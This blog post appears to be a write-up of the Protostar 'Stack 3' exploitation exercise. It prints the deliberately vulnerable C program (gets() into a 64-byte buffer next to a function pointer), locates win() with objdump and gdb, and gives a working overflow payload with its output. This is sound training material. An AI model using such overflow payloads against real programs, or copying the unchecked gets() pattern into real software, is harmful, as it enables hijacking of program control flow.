Sunday, December 9, 2012

exploit-exercises Protostar: Stack 3

This time, with Stack 3 challenge of Protostar wargame, we have another
vulnerable program to exploit. The source code is provided as follow:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];

fp = 0;

gets(buffer);

if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}
}
We have to alter the program to run the win() function. fp is the funciton pointer
whose value should be modified to point to the win() function's memory address.
One method to find win()'s address is to use objdump utility:
user@protostar:~$ objdump -d /opt/protostar/bin/stack3 | grep win
08048424 <win>:
Another method is to use the GNU Debugger:
user@protostar:~$ gdb -q /opt/protostar/bin/stack3
Reading symbols from /opt/protostar/bin/stack3...done.
(gdb) p win
$1 = {void (void)} 0x8048424 <win>
With the target function's address known as 0x8048424 and taking into account
endianess, we use the following payload:
user@protostar:~$ echo `python -c "print 'A'*64+'\x24\x84\x04\x08'"` | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

No comments:

Post a Comment